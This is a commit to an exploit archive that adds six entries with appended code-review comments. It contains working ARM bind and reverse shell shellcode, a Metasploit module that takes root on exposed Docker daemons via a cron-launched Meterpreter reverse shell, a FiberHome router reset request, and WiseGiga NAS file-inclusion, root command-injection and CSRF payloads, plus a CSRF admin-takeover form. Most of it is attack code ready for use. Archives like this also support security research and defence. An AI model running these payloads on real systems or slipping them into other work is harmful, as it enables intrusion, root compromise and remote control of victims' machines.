DB: 2017-09-12

6 new exploits

Docker Daemon - Unprotected TCP Socket (Metasploit)
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)
FiberHome ADSL AN1020-25 - Improper Access Restrictions
WiseGiga NAS - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2017-09-12 05:01:25 +00:00
parent 7744909119
commit 36667e62bc
7 changed files with 714 additions and 0 deletions


@ -15797,6 +15797,7 @@ id,file,description,date,author,platform,type,port
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16443,6 +16444,8 @@ id,file,description,date,author,platform,type,port
42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -38427,3 +38430,6 @@ id,file,description,date,author,platform,type,port
42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0


89
platforms/arm/shellcode/42646.c Executable file

@ -0,0 +1,89 @@
/*
##################################
# Andrea Sindoni - @invictus1306 #
##################################
This schellcode is part of my episodes:
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
Enviroment: Raspberry pi 3
Default settings for port:4444
@.syntax unified
.global _start
_start:
mov r1, #0x5C @ r1=0x5c
mov r5, #0x11 @ r5=0x11
mov r1, r1, lsl #24 @ r1=0x5c000000
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
sub r2, r2, r2 @ sin_addr
push {r1, r2} @ push into the stack r1 and r2
mov r1, sp @ save pointer to sockaddr_in struct
mov r2, #0x10 @ addrlen
mov r0, r6 @ mov sockfd into r0
ldr r7, =#282 @ bind syscall
swi 0
@ listen for incoming connections via SYS_LISTEN
@ int listen(int sockfd, int backlog);
mov r0, r6 @ mov sockfd into r0
mov r1, #1 @ backlog=1
ldr r7, =#284 @ listen syscall
swi 0
@ Accept connections
@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
mov r0, r6 @ mov sockfd into r0
sub r1, r1, r1 @ addr=0
sub r2, r2, r2 @ addrlen=0
ldr r7, =#285 @ accept syscall
swi 0
@ Redirect stdin, stdout and stderr via dup2
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
loop:
mov r7, #63 @ dup2 syscall
swi 0
sub r1, r1, #1 @ decrement counter
cmp r1, #-1 @ compare r1 with -1
bne loop @ if the result is not equal jmp to loop
@ int execve(const char *filename, char *const argv[],char *const envp[]);
mov r0, pc
add r0, #32
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
swi 0
_exit:
mov r0, #0
mov r7, #1
swi 0 @ exit(0)
.asciz "/bin/sh"
Assemble and link it:
as -o bind.o bind.s
ld -o bind bind.o
*/
#include <stdio.h>
char *code="\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\xa0\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x70\x70\x9f\xe5\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\xa0\xe3\x47\x7f\xa0\xe3\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x50\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xfa\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\x1a\x01\x00\x00\x1d\x01\x00\x00";
int main(void) {
(*(void(*)()) code)();
return 0;
}
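Review bot: The assembly listing in the header comment starts at the sockaddr setup and never assigns r6, yet `mov r0, r6 @ mov sockfd into r0` depends on it; the encoded bytes actually begin with a socket() call (`mov r0, #2`, `mov r1, #1`, `mov r2, #0`, `ldr r7, =#281`, `swi 0`, `mov r6, r0`) that the listing omits, so the comment should be completed to match the bytes it documents — the listing in 42647.c has the same gap. The dup2 loop here does not reload r0 from r6 on each iteration (42647.c does), so it only works because each dup2 return value is the fd that was just made a copy of the socket; either reload r0 as in 42647.c or add a comment saying the loop relies on that. The trailing words `\x19\x01\x00\x00`, `\x1a\x01\x00\x00` and `\x1d\x01\x00\x00` are the literal pool for the `ldr r7, =#...` syscall numbers (281, 282, 285) and are worth labelling in the comment so a reader auditing the byte string knows they are data rather than instructions.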

71
platforms/arm/shellcode/42647.c Executable file

@ -0,0 +1,71 @@
/*
##################################
# Andrea Sindoni - @invictus1306 #
##################################
This schellcode is part of my episodes:
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
Enviroment: Raspberry pi 3
Default settings for port:4444 ip:192.168.0.12
.global _start
_start:
mov r1, #0x5C @ r1=0x5c
mov r5, #0x11 @ r5=0x11
mov r1, r1, lsl #24 @ r1=0x5c000000
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
ldr r2, =#0x0c00a8c0 @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me
push {r1, r2} @ push into the stack r1 and r2
mov r1, sp @ save pointer to sockaddr_in struct
mov r2, #0x10 @ addrlen
mov r0, r6 @ mov sockfd into r0
ldr r7, =#283 @ connect syscall
swi 0
@ Redirect stdin, stdout and stderr via dup2
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
loop:
mov r0, r6 @ mov sockfd into r0
mov r7, #63 @ dup2 syscall
swi 0
sub r1, r1, #1 @ decrement counter
cmp r1, #-1 @ compare r1 with -1
bne loop @ if the result is not equal jmp to loop
@ int execve(const char *filename, char *const argv[],char *const envp[]);
mov r0, pc
add r0, #32
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
swi 0
_exit:
mov r0, #0
mov r7, #1
swi 0 @ exit(0)
shell: .asciz "/bin/sh"
Assemble and link it:
as -o reverse_shell.o reverse_shell.s
ld -o reverse_shell reverse_shell.o
*/
#include <stdio.h>
char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00";
int main(void) {
(*(void(*)()) code)();
return 0;
}
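Review bot: The `shell:` label on the `.asciz "/bin/sh"` line is never referenced; the string address is computed as `mov r0, pc` / `add r0, #32`, a fixed offset that silently breaks if any instruction between it and the string is added or removed. Replacing those two instructions with `adr r0, shell` would use the label and let the assembler compute the offset. As in 42646.c, the listing uses r6 as the socket fd without showing the socket() call the byte string begins with, so the comment should be completed to match the bytes.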


@ -0,0 +1,135 @@
Title:
====
FiberHome Unauthenticated ADSL Router Factory Reset.
Credit:
======
Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io
CVE:
=====
CVE-2017-14147
Date:
====
05-09-2017 (dd/mm/yyyy)
About FiberHome:
======
FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.
Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices
URL : http://www.fiberhomegroup.com/
Description:
=======
This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.
Affected Device Model:
=============
FiberHome ADSL AN1020-25
Exploitation-Technique:
===================
Remote
Details:
=======
Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.
1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
Vulnerable restoreinfo.cgi
Proof Of Concept:
================
PoC :
GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close
<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide
function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';
if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}
eval(code);
}
function frmLoad() {
setTimeout("restore()", 60000);
}
// done hiding -->
</script>
</head>
<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>
Credits:
=======
Ibad Shah, Taimooor Zafar, Owais Mehtab
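Review bot: The advisory gives no mitigation or workaround and does not say whether the vendor was notified or responded; an advisory carrying a CVE should have a 'Vendor response' / 'Mitigation' section even if it only records that no reply was received (42651.txt in this commit has one). It also does not say whether the request was reproduced from the WAN side or only from the LAN (`Host: 192.168.1.1`), which determines the exposure a reader should assume. The `Date: Sat, 01 Jan 2000` header in the captured response suggests the device clock is unset, which is worth a line because it affects any log-based investigation of a reset.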


@ -0,0 +1,171 @@
Source: https://blogs.securiteam.com/index.php/archives/3402
Vulnerabilities summary
The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices.
WiseGiga is a Korean company selling NAS products.
The vulnerabilities found in WiseGiga NAS are:
Pre-Authentication Local File Inclusion (4 different vulnerabilities)
Post-Authentication Local File Inclusion
Remote Command Execution as root
Remote Command Execution as root with CSRF
Info Leak
Default accounts
Credit
An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
Vulnerabilities details
Pre-Authentication Local File Inclusion
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
By sending GET request to the following URIs with filename= as a parameter, an attacker can trigger the vulnerabilities:
/webfolder/download_file1.php
down_data.php
download_file.php
mobile/download_file1.php
Proof of Concept
http://IP/webfolder/download_file1.php?filename=/etc/passwd
http://IP/down_data.php?filename=/etc/passwd
http://IP/download_file.php?filename=base64(/etc/passwd)
http://IP/mobile/download_file1.php?filename=base64(/etc/passwd)
Post-Authentication Local File Inclusion
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability.
Proof of Concept
http://IP//mobile/download_file2.php?filename=base64(/etc/passwd)
Remote Command Execution as root
The WiseGiga NAS firmware contain pre.php files in the different directories.
For example:
/app_data/apache/htdocs/auto/pre.php
/app_data/apache/htdocs/admin/iframe/pre.php
/app_data/apache/htdocs/admin/pre.php
/app_data/apache/htdocs/mobile/pre.php
/app_data/apache/htdocs/wiseapp/config/pre.php
/app_data/apache/htdocs/pre.php
/home/htdocs/webfolder/pre.php
/ub/update/init/pre.php
/tmp/home/root/htdocs/auto/pre.php
/tmp/home/root/htdocs/pre.php
A “standard” pre.php contains:
181 [...]
182 function auth()
183 {
184 global $memberid;
185 session_start();
186 //echo $memberid;
187 if($memberid=="root")
188 {
189 // print<<<__DATA_OF_HTML__
190 //<script language="JavaScript">
191 // alert("sucess !");
192 //</script>
193 //__DATA_OF_HTML__;
194 }
195 else
196 {
197 print<<<__DATA_OF_HTML__
198 <script language="JavaScript">
199 alert("\xc0\xce\xc1\xf5\xb9\xde\xc1\xf6 \xbe\xca\xc0\xba \xbb\xe7\xbf\xeb\xc0\xda\xc0\xd4\xb4\xcf\xb4\xd9!");
200 // location.href='/admin/';
201 window.open('index.php','_parent');
202 exit;
203 </script>
204 __DATA_OF_HTML__;
205 }
206
207 }
Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (“root”) inside the HTTP request:
GET /webpage[...]?memberid=root&[...] HTTP/1.0
The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen():
23 function root_exec_cmd($cmd)
24 {
25 $tmpfile=fopen("/tmp/ramdisk/cmd.list","w");
26 fwrite($tmpfile,$cmd);
27 fclose($tmpfile);
28 popen("/tmp/ramdisk/ramush","r");
29 }
By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands
The WiseGiga NAS runs the Apache server as root (uid=0 with gid=48 “apache”) hence the commands will execute as root.
Proof of Concept
By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function:
178 if($cmd == "add")
179 {
180 add_system();
181 }
The add_system() function uses global for $group_name and $user_data.
Then it will pass the user controlled input and will run it as root:
145 function add_system()
146 {
147 global $group_name,$user_data;
148
149 if(add_conf()==1)
150 {
151 //====================================================================================
152 root_exec_cmd("addgroup $group_name");
An attacker can get unauthenticated RCE as root by sending the following request:
http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a
The file /tmp/a will contain:
uid=0(root) gid=48(apache) groups=48(apache)
Remote Command Execution as root with CSRF
There is no CSRF protection in WiseGiga NAS.
An attacker can force the execution of a command as root when the victim visits the malicious website.
Proof of Concept
Once the victim visit the attackers website with the following code, the attacker can execute arbitrary commands.
<img src="http://192.168.1.1/admin/group.php?memberid=root&cmd=add&group_name=d;COMMANDTOEXECUTE">
InfoLeak
accessing http://IP/webfolder/config/config.php will disclose the PHP configuration.
Default accounts
Username: guest
Password: guest09#$
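Review bot: The root cause is not named: the quoted `auth()` reads `global $memberid` and the PoC sets it from the query string, which only works if request parameters populate PHP globals (register_globals or an `extract()`-style import) — the advisory should state which, since that is the fix (stop importing request data into globals and have `auth()` read the session it just started rather than a global). For defenders, the advisory could note what the shown path leaves behind: `root_exec_cmd()` writes the command to `/tmp/ramdisk/cmd.list` before running `/tmp/ramdisk/ramush`, and the PoC goes through `addgroup`, so that file and unexpected group changes are concrete artefacts to look for. The CSRF section would be clearer if it said the forged request needs no session cookie at all given the `memberid=root` bypass, so SameSite cookies alone would not close it.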


@ -0,0 +1,35 @@
<!--
# # # # #
# Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 11.09.2017
# Vendor Homepage: http://ranksol.com/
# Software Link: http://www.mojomarketplace.com/item/nimble-pro
# Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
-->
<html>
<body>
<label>Edit Profile:</label>
<form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
<label>Admin Name:</label>
<input type="text" name="name" style="width: 400px;" value="Admin">
<label>Admin Email:</label>
<input type="text" name="email" style="width: 400px;" value="a@a.com">
<label>Admin Password:</label>
<input type="text" name="pass" style="width: 400px;" value="efe">
<button type="submit" class="btn btn-success" >Save Profile</button>
<input type="hidden" name="cmd" value="save_profile">
</form>
</body>
</html>
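Review bot: The header block does not describe the impact or the vulnerable request: the form posts `name`, `email`, `pass` and `cmd=save_profile` to `ajax.php`, so the issue is that the profile-update endpoint accepts a cross-origin POST with no anti-CSRF token and overwrites the admin credentials; a `# Description:` line saying so and naming the endpoint and parameters would let a reader assess it without reverse-engineering the form. A short 'Fix' line (per-session CSRF token checked on `save_profile`, re-authentication for password changes) would also be a useful addition.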

207
platforms/python/remote/42650.rb Executable file

@ -0,0 +1,207 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit',
'Description' => %q{
Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
with tls but without tls-auth), an attacker can create a Docker
container with the '/' path mounted with read/write permissions on the
host server that is running the Docker container. As the Docker
container executes command as uid 0 it is honored by the host operating
system allowing the attacker to edit/create files owned by root. This
exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
the host server.
The Docker image should exist on the target system or be a valid image
from hub.docker.com.
},
'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
],
'DisclosureDate' => 'Jul 25, 2017',
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}]
],
'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(2375),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
]
)
end
def check_image(image_id)
vprint_status("Check if images exist on the target host")
res = send_request_raw(
'method' => 'GET',
'uri' => normalize_uri('images', 'json')
)
return unless res and res.code == 200 and res.body.include? image_id
res
end
def pull_image(image_id)
print_status("Trying to pulling image from docker registry, this may take a while")
res = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('images', 'create?fromImage=' + image_id)
)
return unless res.code == 200
res
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
command << "echo \"\" >> #{echo_cron_path} && "
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
command
end
def make_container(mnt_path, cron_path, payload_path)
vprint_status('Setting container json request variables')
{
'Image' => datastore['DOCKERIMAGE'],
'Cmd' => make_cmd(mnt_path, cron_path, payload_path),
'Entrypoint' => %w[/bin/sh -c],
'HostConfig' => {
'Binds' => [
'/:' + mnt_path
]
}
}
end
def del_container(container_id)
send_request_raw(
{
'method' => 'DELETE',
'uri' => normalize_uri('containers', container_id)
},
1 # timeout
)
end
def check
res = send_request_raw(
'method' => 'GET',
'uri' => normalize_uri('containers', 'json'),
'headers' => { 'Accept' => 'application/json' }
)
if res.nil?
print_error('Failed to connect to the target')
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.headers['Server'].include? 'Docker'
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
# check if target is vulnerable
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, 'Failed to connect to the target')
end
# check if image is not available, pull it or fail out
image_id = datastore['DOCKERIMAGE']
if check_image(image_id).nil?
fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil?
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id
# create container
res_create = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('containers', 'create?name=' + container_id),
'headers' => { 'Content-Type' => 'application/json' },
'data' => make_container(mnt_path, cron_path, payload_path).to_json
)
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
print_status("The docker container is created, waiting for deploy")
register_files_for_cleanup(cron_path, payload_path)
# start container
send_request_raw(
{
'method' => 'POST',
'uri' => normalize_uri('containers', container_id, 'start')
},
1 # timeout
)
# wait until container stopped
vprint_status("Waiting until the docker container stopped")
res_wait = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('containers', container_id, 'wait'),
'headers' => { 'Accept' => 'application/json' }
)
# delete container
deleted_container = false
if res_wait.code == 200
vprint_status("The docker container has been stopped, now trying to remove it")
del_container(container_id)
deleted_container = true
end
# if container does not deploy, remove it and fail out
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to deploy")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end
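Review bot: `send_request_raw` returns nil when the request fails or times out, and three call sites dereference the result unguarded: `return unless res.code == 200` in pull_image, `res.headers['Server'].include? 'Docker'` in check (the header may also be absent), and `if res_wait.code == 200` in exploit — each raises NoMethodError instead of failing cleanly, and in the last case the container is never deleted. Suggested lines: `return unless res && res.code == 200`, `if res.code == 200 && res.headers['Server'].to_s.include?('Docker')`, and `if res_wait && res_wait.code == 200`. The `deleted_container` flag that follows is redundant, since both branches call `del_container(container_id)`; the block reduces to an unconditional delete followed by `fail_with(...)` unless the wait returned 200. `check_image`'s `res.body.include? image_id` is a substring test on the JSON image list, so an image name that is a prefix of another tag matches; comparing against the parsed `RepoTags` entries would be exact. `and` is used for boolean logic in check_image and check where `&&` is the convention.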